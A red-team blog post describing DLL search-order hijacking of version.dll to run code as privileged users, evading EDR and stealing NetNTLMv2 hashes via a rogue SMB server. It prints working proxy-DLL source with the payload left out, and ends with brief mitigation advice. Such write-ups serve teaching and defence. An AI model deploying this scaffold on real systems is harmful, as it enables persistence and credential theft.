_ _ / | _| |_ _ _____ ___ ___ ___ ___ ___ _ / / | . | | | | . | _| . | _| -_| |_|_/ |___|___|_|_|_| _|___|___|_| |___| |_| 2020-10-14 Alternative to LSASS dumping ============================ TL;DR: Dumping credentials from LSASS may not always be trivial due to the presence of EDR products, and bypassing such products may not always be trivial. Instead, persistence techniques such as DLL search-order hijacks may results in code execution in the context of the targeted privileged users, that may be used to launch malware and steal NetNTLMv2 hashes, for offline password cracking. A positive side effect is that no traditional typical lateral movement technique such as e.g. RDP/PsExec/WmiExec/AtExec, is needed to access the host as the attacker's malware is already running there. # Background On a red team engagement, we observed indicators of highly-privileged users having authenticated against the compromised host after the last reboot. Therefore, we deemed it likely that their credentials were still cached in the LSASS process memory space, ripe for dumping since we already had gained local administrative privileges on the host. However, as we believed that the present EDR solution was found to detect available dumping techniques, alternatives were explored. We took a step back and challenged our current assumptions, one of them being that we had to dump LSASS in order to gain access to the credentials of users who appeared to use the compromised host from time to time. We realized that all we needed was a shell in the target user's context, from where we might be able to steal the NetNTLMv2 hash, by browsing a rogue SMB server, e.g. Responder, which we could run somewhere else in the environment. # Remote process injection Since we had achieved local administrative privileges, we discussed the possibility of simply injecting malware into a process that was running in the context of the target users. However, we abandoned the idea, as we deemed it likely that the EDR product would detect it. # DLL search-order hijacking [1] As part of the reconnaissance efforts, we had learned that the target organization had deployed a specific application on most, if not all, hosts that was executed on boot and was running in the context of the logged on user. Since we had already established local administrative privileges, we considered modifying the executable or its DLLs, in order to get code execution in the context of the target user, upon their next login. However, as certain users already were logged on, or had a disconnected session running, we simply couldn't modify existing files as they were locked. We also deemed it likely, that modification of existing binaries would trigger alarms. Instead, we wanted to upload a new file, that would not interfere with existing sessions and instances of the target application, while still executing our malware in the context of the target application upon login. We therefore inspected the application with ProcMon [2] to identify potential targets of DLL search-order hijacking in a test environment. We found, among others, that C:\Windows\SysWOW64\version.dll was a suitable target, as it was found to be statically loaded. By placing a malicious version.dll in the directory of the target application, odds were that our DLL would be loaded, instead of the legitimate one in the SysWOW64 directory. # Export Forwarding However, before our DLL would be loaded, we had to ensure that it exports the same functions as the legitimate DLL. Otherwise, Windows' subsystem responsible for loading the DLL would simply ignore it. To do so, we examined the legitimate version.dll with Nirsoft's excellent DLL Export Viewer [3], and doing so we identified the list of functions that we had to export as well. Using this list of functions, we used Export Forwarding: "A forwarded export is a pointer to an export in another binary; if it is used, the pointed-to export in the other binary is used instead." [4] In other words, PE files have the ability to add an export to their export table that is really just a pointer to an existing export in another binary. Thus, we don't have to implement or do anything fancy ourselves. We can simply just tell our target application that it should use the real functions in the real version.dll. This can be achieved with by using a comment pragma, to instruct our linker to add the exports. E.g. to add an export that forwards the GetFileVersionInfoA() function to the same function in C:\Windows\Syswow64\version.dll, one would add the following: #pragma comment(linker, "/export:GetFileVersionInfoA=\"C:\\Windows\\SysW OW64\\version.GetFileVersionInfoA\"") # Execution of malware The entry point, DllMain [5], was used to instantiate an instance of the used malware. To avoid slowing down execution of the target application, CreateThread() was used to start a new thread responsible for launching our malware. Due to the nature of load process of libraries, it is discouraged to use Win32 APIs in DllMain. However, in our experience, it is safe to use certain APIs, e.g. CreateThread(). # Ensuring execution of malware no more than once During testing of our malicious DLL, we quickly realized that it was loaded multiple times. If left ignored, our malware would be loaded equally multiple times, which was not intended. To resolve the issue, we chose to employ a mutex that at runtime is named based on the name of the current running process. # Side effects From an attackers point of view, a number of attractive side effects were observed: 1. Due to the nature of DLLs, no new processes were launched. Instead our malware was launched in a new thread of a application that was to be launched anyway. 2. As the targeted application was launched immediately after login for all users, persistence was automatically ensured. 3. As the installation of the DLL only needed disk access, the technique could also be utilised as a means of lateral movement in addition to privilege escalation, by simply writing the file over the network with SMB. # Source code Although the actual execution of our malware and the malware itself has been omitted here, all other details that are relevant for the techniques has been left untouched: 1 #include "pch.h" 2 #include 3 #include 4 #include 5 #include 6 7 #pragma comment(linker, "/export:GetFileVersionInfoA=\"C:\\Windows\\Sy sWOW64\\version.GetFileVersionInfoA\"") 8 #pragma comment(linker, "/export:GetFileVersionInfoByHandle=\"C:\\Wind ows\\SysWOW64\\version.GetFileVersionInfoByHandle\"") 9 #pragma comment(linker, "/export:GetFileVersionInfoExW=\"C:\\Windows\\ SysWOW64\\version.GetFileVersionInfoExW\"") 10 #pragma comment(linker, "/export:GetFileVersionInfoSizeA=\"C:\\Windows \\SysWOW64\\version.GetFileVersionInfoSizeA\"") 11 #pragma comment(linker, "/export:GetFileVersionInfoSizeW=\"C:\\Windows \\SysWOW64\\version.GetFileVersionInfoSizeW\"") 12 #pragma comment(linker, "/export:GetFileVersionInfoSizeExW=\"C:\\Windo ws\\SysWOW64\\version.GetFileVersionInfoSizeExW\"") 13 #pragma comment(linker, "/export:GetFileVersionInfoW=\"C:\\Windows\\Sy sWOW64\\version.GetFileVersionInfoW\"") 14 #pragma comment(linker, "/export:VerFindFileA=\"C:\\Windows\\SysWOW64\ \version.VerFindFileA\"") 15 #pragma comment(linker, "/export:VerFindFileW=\"C:\\Windows\\SysWOW64\ \version.VerFindFileW\"") 16 #pragma comment(linker, "/export:VerInstallFileA=\"C:\\Windows\\SysWOW 64\\version.VerInstallFileA\"") 17 #pragma comment(linker, "/export:VerInstallFileW=\"C:\\Windows\\SysWOW 64\\version.VerInstallFileW\"") 18 #pragma comment(linker, "/export:VerLanguageNameA=\"C:\\Windows\\SysWO W64\\version.VerLanguageNameA\"") 19 #pragma comment(linker, "/export:VerLanguageNameW=\"C:\\Windows\\SysWO W64\\version.VerLanguageNameW\"") 20 #pragma comment(linker, "/export:VerQueryValueA=\"C:\\Windows\\SysWOW6 4\\version.VerQueryValueA\"") 21 #pragma comment(linker, "/export:VerQueryValueW=\"C:\\Windows\\SysWOW6 4\\version.VerQueryValueW\"") 22 23 BOOL isRunning() 24 { 25 TCHAR szFileName[MAX_PATH]; 26 GetModuleFileName(NULL, szFileName, MAX_PATH); 27 28 char fileNam[MAX_PATH]; 29 size_t i; 30 wcstombs_s(&i, fileNam, szFileName, MAX_PATH); 31 char* fileName = strrchr(fileNam, '\\') + 1; 32 33 HANDLE h = CreateMutexA(NULL, TRUE, (LPCSTR)fileName); 34 35 if (h) 36 { 37 if (GetLastError() == ERROR_ALREADY_EXISTS) { 38 return TRUE; 39 } 40 } 41 else { 42 return TRUE; 43 } 44 return FALSE; 45 } 46 47 void run() 48 { 49 if (!isRunning()) { 50 // execute malware here 51 } 52 } 53 54 BOOL APIENTRY DllMain( HMODULE hModule, 55 DWORD ul_reason_for_call, 56 LPVOID lpReserved 57 ) 58 { 59 if (ul_reason_for_call == DLL_PROCESS_ATTACH) { 60 CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)run, 0, 0, NULL); 61 } 62 63 return TRUE; 64 } Source is also available at: dumpco.re/lab/search-order-hijacking.cpp # Mitigation While the best mitigation against attacks as the one described here is to ensure that write access to application folders is both restricted and monitored, a secondary approach could be to periodically investigate occurrences of DLLs that have the same name as DLLs located in System32 or SysWOW64. # References 1: https://attack.mitre.org/techniques/T1574/001/ 2: https://docs.microsoft.com/en-us/sysinternals/downloads/procmon 3: https://www.nirsoft.net/utils/dll_export_viewer.html 4: http://www.pelib.com/resources/luevel.txt 5: https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain